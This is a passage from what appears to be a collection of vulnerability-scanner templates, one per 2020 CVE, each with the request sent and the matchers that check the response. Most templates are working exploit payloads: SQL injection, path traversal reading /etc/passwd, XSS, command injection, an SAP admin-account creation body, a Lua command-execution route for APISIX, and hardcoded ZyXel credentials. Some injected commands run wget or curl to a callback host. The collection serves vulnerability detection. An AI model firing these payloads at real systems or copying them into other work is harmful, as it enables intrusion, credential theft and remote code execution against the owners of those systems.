/fuel/login/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}\n\nuser_name={{username}}&password={{password}}&Login=Login&forward=\n","@timeout: 10s\nGET /fuel/pages/items/?search_term=&published=&layout=&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(6)))ULQV)&fuel_inline=0 HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nReferer: {{RootURL}}\n"],"payloads":{"username":["admin"],"password":["admin"]},"attack":"pitchfork","matchers":[{"type":"dsl","dsl":["duration>=6","status_code_3 == 200","contains(body_1, \"FUEL CMS\")"],"condition":"and"}]}]},{"id":"CVE-2020-27191","info":{"name":"LionWiki <3.2.12 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?page=&action=edit&f1=.//./\\.//./\\.//./\\.//./\\.//./\\.//./etc/passwd&restore=1"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5777","info":{"name":"Magento Mass Importer  <0.7.24 - Remote Auth Bypass","severity":"critical"},"requests":[{"raw":["GET /index.php/catalogsearch/advanced/result/?name=e HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Too many connections"]},{"type":"status","status":[503]}]}]},{"id":"CVE-2020-9484","info":{"name":"Apache Tomcat Remote Command Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.jsp"],"headers":{"Cookie":"JSESSIONID=../../../../../usr/local/tomcat/groovy"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Exception","ObjectInputStream","PersistentManagerBase"],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-17518","info":{"name":"Apache Flink 1.5.1 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /jars/upload HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y\n\n------WebKitFormBoundaryoZ8meKnrrso89R6Y\nContent-Disposition: form-data; name=\"jarfile\"; filename=\"../../../../../../../tmp/poc\"\n\n{{randstr}}\n------WebKitFormBoundaryoZ8meKnrrso89R6Y--\n","GET /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc HTTP/1.1\n"],"matchers":[{"type":"dsl","dsl":["contains(body_2, \"{{randstr}}\") && status_code == 200"]}]}]},{"id":"CVE-2020-29395","info":{"name":"Wordpress EventON Calendar 3.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["/wp-content/plugins/eventON/"]}]},{"method":"GET","path":["{{BaseURL}}/addons/?q=%3Csvg%2Fonload%3Dalert(1)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(1)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13945","info":{"name":"Apache APISIX - Insufficiently Protected Credentials","severity":"medium"},"requests":[{"raw":["POST /apisix/admin/routes HTTP/1.1\nHost: {{Hostname}}\nX-API-KEY: edd1c9f034335f136f87ad84b625c8f1\nContent-Type: application/json\n\n{\n  \"uri\":\"/{{randstr}}\",\n  \"script\":\"local _M = {} \\n function _M.access(conf, ctx) \\n local os = require('os')\\n local args = assert(ngx.req.get_uri_args()) \\n local f =        assert(io.popen(args.cmd, 'r'))\\n local s = assert(f:read('*a'))\\n ngx.say(s)\\n f:close()  \\n end \\nreturn _M\",\n  \"upstream\":{\n    \"type\":\"roundrobin\",\n    \"nodes\":{\n      \"interact.sh:80\":1\n    }\n  }\n}\n","GET /{{randstr}}?cmd=id HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"action\":\"create\"","\"script\":","\"node\":"],"condition":"and"},{"type":"status","status":[201]}],"extractors":[{"type":"regex","regex":["((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"]}]}]},{"id":"CVE-2020-29583","info":{"name":"ZyXel USG - Hardcoded Credentials","severity":"critical"},"requests":[{"raw":["GET /?username=zyfwp&password=PrOw!aN_fXp HTTP/1.1\nHost: {{Hostname}}\n","GET /ext-js/index.html HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["data-qtip=\"Web Console","CLI","Configuration\"></a>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-2140","info":{"name":"Jenkin Audit Trail <=3.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample","{{BaseURL}}/jenkins/descriptorByName/AuditTrailPlugin/regexCheck?value=*j%3Ch1%3Esample"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<h1>sample"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14144","info":{"name":"Gitea 1.1.0 - 1.12.5 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}\n","GET /repo/create HTTP/1.1\nHost: {{Hostname}}\n","POST /repo/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&uid=1&repo_name={{randstr}}&private=on&description=&repo_template=&issue_labels=&gitignores=&license=&readme=Default&auto_init=on&default_branch=master\n","POST /{{username}}/{{randstr}}/settings/hooks/git/post-receive HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&content=%23%21%2Fbin%2Fbash%0D%0Acurl+{{interactsh-url}}\n","GET /{{username}}/{{randstr}}/_new/master HTTP/1.1\nHost: {{Hostname}}\n","POST /{{username}}/{{randstr}}/_new/master HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&last_commit={{last_commit}}&tree_path=test.txt&content=test&commit_summary=&commit_message=&commit_choice=direct\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body_1","words":["Gitea:"]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"_csrf\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"auth_csrf","group":1,"regex":["name=\"_csrf\" content=\"(.*)\""],"internal":true},{"type":"regex","name":"last_commit","group":1,"regex":["name=\"last_commit\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2020-5192","info":{"name":"Hospital Management System 4.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /hospital/hms/doctor/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}password={{password}}&submit=&submit=\n","POST /hospital/hms/doctor/search.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsearchdata='+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT(md5({{num}}),1),2),NULL--+PqeG&search=\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-36289","info":{"name":"Jira Server and Data Center - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin","{{BaseURL}}/jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["rel=\\\"admin\\\""]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15129","info":{"name":"Traefik - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"headers":{"X-Forwarded-Prefix":"https://foo.nl"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a href=\"https://foo.nl/dashboard/\">Found</a>"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2020-4463","info":{"name":"IBM Maximo Asset Management Information Disclosure - XML External Entity Injection","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/os/mxperson","{{BaseURL}}/meaweb/os/mxperson"],"body":"<?xml version='1.0' encoding='UTF-8'?>\n<max:QueryMXPERSON xmlns:max='http://www.ibm.com/maximo'>\n  <max:MXPERSONQuery></max:MXPERSONQuery>\n</max:QueryMXPERSON>\n","headers":{"Content-Type":"application/xml"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["QueryMXPERSONResponse","MXPERSONSet"]},{"type":"word","part":"header","words":["application/xml"]}]}]},{"id":"CVE-2020-21224","info":{"name":"Inspur ClusterEngine 4.0 - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/login"],"body":"op=login&username=;`cat /etc/passwd`&password=\n","headers":{"Content-Type":"application/x-www-form-urlencoded","Referer":"{{Hostname}}/module/login/login.html"},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14413","info":{"name":"NeDi 1.9C - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Devices-Config.php?sta=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-28185","info":{"name":"TerraMaster TOS < 4.2.06 - User Enumeration","severity":"medium"},"requests":[{"raw":["GET /tos/index.php?user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /wizard/initialise.php HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nReferer: {{RootURL}}/tos/index.php?user/login\n\ntab=checkuser&username=admin\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"username\":","\"email\":","\"status\":"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","part":"body_2","regex":["\"username\":\"(.*?)\"","\"email\":\"(.*?)\""]}]}]},{"id":"CVE-2020-24571","info":{"name":"NexusDB <4.50.23 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../../../windows/win.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[extensions]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10546","info":{"name":"rConfig 3.9.4 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/compliancepolicies.inc.php?search=True&searchColumn=policyName&searchOption=contains&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL+--+"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[project-discovery]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-25540","info":{"name":"ThinkAdmin 6 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-15505","info":{"name":"MobileIron Core & Connector <= v10.6 & Sentry <= v9.8 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /mifs/.;/services/LogService HTTP/1.1\nHost: {{Hostname}}\nReferer: https://{{Hostname}}\nContent-Type: x-application/hessian\nConnection: close\n\n{{hex_decode('630200480004')}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/x-hessian"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13167","info":{"name":"Netsweeper <=6.4.3 - Python Code Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%27{{url_encode(hex_encode(cmd))}}%27.decode%28%27hex%27%29%29%23&timeout=5","{{BaseURL}}/webadmin/out"],"headers":{"Referer":"{{BaseURL}}/webadmin/admin/service_manager_data.php"},"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{rand_str}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17506","info":{"name":"Artica Web Proxy 4.30 - Authentication Bypass/SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27;"],"host-redirects":true,"max-redirects":1,"matchers-condition":"and","matchers":[{"type":"word","words":["artica-applianc"]},{"type":"word","part":"header","words":["PHPSESSID"]},{"type":"status","status":[200,301,302],"condition":"or"}],"extractors":[{"type":"kval","kval":["PHPSESSID"]}]}]},{"id":"CVE-2020-29164","info":{"name":"PacsOne Server <7.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pacs/login.php?message=%3Cimg%20src=%22%22%20onerror=%22alert(1);%22%3E1%3C/img%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["<img src=\"\" onerror=\"alert(1);\">1</img>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-9376","info":{"name":"D-Link DIR-610 Devices - Information Disclosure","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/getcfg.php"],"body":"SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<name>Admin</name>","</usrid>","</password>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14092","info":{"name":"WordPress PayPal Pro <1.1.65 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["\"user_login\"","\"user_email\"","\"user_pass\"","\"user_activation_key\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-17526","info":{"name":"Apache Airflow <1.10.14 - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /admin/ HTTP/1.1\nHost: {{Hostname}}\n","GET /admin/ HTTP/1.1\nHost: {{Hostname}}\nCookie: session=.eJwlzUEOwiAQRuG7zLoLpgMM9DIE6D-xqdEEdGW8u03cvy_vQ8UG5o02q_eJhcqx00YdDaKao6p5ZZe89ZyFUaPExqCF-hxWXs8Tj6tXt_rGnKpxC6vviTNiELBxErerBBZk9Zd7T4z_hOn7A0cWI94.YwJ5bw.LzJjDflCTQE2BfJ7kXcsOi49vvY\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, 'Redirecting...')","status_code_1 == 302"],"condition":"and"},{"type":"word","part":"body_2","words":["DAG","Recent Tasks","Users","SLA Misses","Task Instances"],"condition":"and"}]}]},{"id":"CVE-2020-24701","info":{"name":"OX Appsuite - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax/apps/manifests?action=all&format=debug&xss=<script>alert(document.domain);</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Request with action all","<script>alert(document.domain);</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-6287","info":{"name":"SAP NetWeaver AS JAVA 7.30-7.50 - Remote Admin Addition","severity":"critical"},"requests":[{"raw":["POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml; charset=UTF-8\nConnection: close\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:urn=\"urn:CTCWebServiceSi\"><soapenv:Header/><soapenv:Body><urn:executeSynchronious><identifier><component>sap.com/tc~lm~config~content</component><path>content/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc</path></identifier><contextMessages><baData>\n  CiAgICAgICAgICAgIDxQQ0s+CiAgICAgICAgICAgIDxVc2VybWFuYWdlbWVudD4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT05GSUc+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+QWRtaW5pc3RyYXRvcjwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0NPTkZJRz4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgICAgPHJvbGVOYW1lPlRoaXNJc1JuZDczODA8L3JvbGVOYW1lPgogICAgICAgICAgICAgIDwvU0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgIDxTQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgPFNBUF9YSV9QQ0tfQURNSU4+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0FETUlOPgogICAgICAgICAgICAgIDxQQ0tVc2VyPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lIHNlY3VyZT0idHJ1ZSI+c2FwUnBvYzYzNTE8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+U2VjdXJlIVB3RDg4OTA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLVXNlcj4KICAgICAgICAgICAgICA8UENLUmVjZWl2ZXI+CiAgICAgICAgICAgICAgICA8dXNlck5hbWU+VGhpc0lzUm5kNzM4MDwvdXNlck5hbWU+CiAgICAgICAgICAgICAgICA8cGFzc3dvcmQgc2VjdXJlPSJ0cnVlIj5UaGlzSXNSbmQ3MzgwPC9wYXNzd29yZD4KICAgICAgICAgICAgICA8L1BDS1JlY2VpdmVyPgogICAgICAgICAgICAgIDxQQ0tNb25pdG9yPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lPlRoaXNJc1JuZDczODA8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+VGhpc0lzUm5kNzM4MDwvcGFzc3dvcmQ+CiAgICAgICAgICAgICAgPC9QQ0tNb25pdG9yPgogICAgICAgICAgICAgIDxQQ0tBZG1pbj4KICAgICAgICAgICAgICAgIDx1c2VyTmFtZT5UaGlzSXNSbmQ3MzgwPC91c2VyTmFtZT4KICAgICAgICAgICAgICAgIDxwYXNzd29yZCBzZWN1cmU9InRydWUiPlRoaXNJc1JuZDczODA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLQWRtaW4+CiAgICAgICAgICAgIDwvVXNlcm1hbmFnZW1lbnQ+CiAgICAgICAgICA8L1BDSz4KICAgIA==\n</baData><name>userDetails</name></contextMessages></urn:executeSynchronious></soapenv:Body></soapenv:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["CTCWebServiceSi","SOAP-ENV"],"condition":"and"},{"type":"word","part":"header","words":["text/xml","SAP NetWeaver Application Server"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-1956","info":{"name":"Apache Kylin 3.0.1 - Command Injection Vulnerability","severity":"high"},"requests":[{"raw":["POST /kylin/api/user/authentication HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic {{base64('{{username}}:' + '{{password}}')}}\n","POST /kylin/api/cubes/kylin_streaming_cube/%2031%60curl%20{{interactsh-url}}%60/migrate HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2020-15920","info":{"name":"Mida eFramework <=2.9.0 - Remote Command Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13117","info":{"name":"Wavlink Multiple AP - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/login.cgi HTTP/1.1\nHost: {{Hostname}}\nOrigin: http://{{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAccept-Encoding: gzip, deflate\n\nnewUI=1&page=login&username=admin&langChange=0&ipaddr=192.168.1.66&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=wifi.wavlink.com&key=%27%3B%60wget+http%3A%2F%2F{{interactsh-url}}%3B%60%3B%23&password=asd&lang_select=en\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["parent.location.replace"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-2036","info":{"name":"Palo Alto Networks PAN-OS Web Interface - Cross Site-Scripting","severity":"high"},"requests":[{"raw":["GET /_404_/%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains(tolower(body_1), '<svg/onload=alert(document.domain)>')"],"condition":"and"},{"type":"dsl","dsl":["status_code_2 == 200 && contains(header_2, 'text/html') && contains(tolower(body_2), '<svg/onload=alert(document.domain)>')","status_code_3 == 200 && contains(header_3, 'text/html') && contains(tolower(body_3), '<svg/onload=alert(document.domain)>')"],"condition":"or"}]}]},{"id":"CVE-2020-35729","info":{"name":"Klog Server <=2.41 - Unauthenticated Command Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/actions/authenticate.php"],"body":"user={{dummy}}%20%26%20echo%20%cG9jLXRlc3Rpbmc%3D%22%20%7C%20base64%20-d%20%26%20echo%22&pswd={{dummy}}","matchers":[{"type":"word","words":["poc-testing"]}]}]},{"id":"CVE-2020-9757","info":{"name":"Craft CMS < 3.3.0 - Server-Side Template Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}}","{{BaseURL}}/actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}}"],"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["MetaLinkContainer","canonical","22344"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-20982","info":{"name":"shadoweb wdja v1.5.1 - Cross-Site Scripting","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["location.href='</script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26073","info":{"name":"Cisco SD-WAN vManage Software - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"status","status":[200]},{"type":"regex","regex":["root:.*:0:0:"],"part":"body"}]}]},{"id":"CVE-2020-12800","info":{"name":"WordPress Contact Form 7 <1.3.3.3 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------350278735926454076983690555601\nX-Requested-With: XMLHttpRequest\n\n-----------------------------350278735926454076983690555601\nContent-Disposition: form-data; name=\"supported_type\"\n\ntxt%\n-----------------------------350278735926454076983690555601\nContent-Disposition: form-data; name=\"size_limit\"\n\n5242880\n-----------------------------350278735926454076983690555601\nContent-Disposition: form-data; name=\"action\"\n\ndnd_codedropz_upload\n-----------------------------350278735926454076983690555601\nContent-Disposition: form-data; name=\"type\"\n\nclick\n-----------------------------350278735926454076983690555601\nContent-Disposition: form-data; name=\"upload-file\"; filename=\"{{randstr}}.txt%\"\nContent-Type: application/x-httpd-php\n\nCVE-2020-12800-{{randstr}}\n-----------------------------350278735926454076983690555601--\n","GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/{{randstr}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["CVE-2020-12800-{{randstr}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-7796","info":{"name":"Zimbra Collaboration Suite < 8.8.15 Patch 7 - Server-Side Request Forgery","severity":"critical"},"requests":[{"raw":["GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://{{interactsh-url}}%23 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-24223","info":{"name":"Mara CMS  7.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/contact.php?theme=tes%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26919","info":{"name":"NETGEAR ProSAFE Plus - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /login.htm HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n\nsubmitId=debug&debugCmd=wget+http://{{interactsh-url}}&submitEnd=\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2020-13700","info":{"name":"WordPresss acf-to-rest-api <=3.1.0 - Insecure Direct Object Reference","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/acf/v3/options/a?id=active&field=plugins"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Content-Type: application/json"]},{"type":"word","part":"body","words":["acf-to-rest-api\\/class-acf-to-rest-api.php"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-22208","info":{"name":"74cms - ajax_street.php 'x' SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/ajax_street.php?act=alphabet&x=11\ufffd%27%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,md5({{num}}),9%20from%20qs_admin#"],"matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]}]}]},{"id":"CVE-2020-13405","info":{"name":"Microweber <1.1.20 - Information Disclosure","severity":"high"},"requests":[{"raw":["POST /module/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{BaseURL}}admin/view:modules/load_module:users\n\nmodule={{endpoint}}\n"],"payloads":{"endpoint":["users/controller","modules/users/controller","/modules/users/controller"]},"matchers":[{"type":"dsl","dsl":["contains(body,\"username\")","contains(body,\"password\")","contains(body,\"password_reset_hash\")","status_code==200","contains(header,\"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2020-9047","info":{"name":"exacqVision Web Service - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/version.web"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["3.10.4.72058","3.12.4.76544","3.8.2.67295","7.0.2.81005","7.2.7.86974","7.4.3.89785","7.6.4.94391","7.8.2.97826","8.0.6.105408","8.2.2.107285","8.4.3.111614","8.6.3.116175","8.8.1.118913","9.0.3.124620","9.2.0.127940","9.4.3.137684","9.6.7.145949","9.8.4.149166","19.03.3.152166","19.06.4.157118","19.09.4.0","19.12.2.0","20.03.2.0","20.06.3.0"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-7980","info":{"name":"Satellian Intellian Aptus Web <= 1.24 - Remote Command 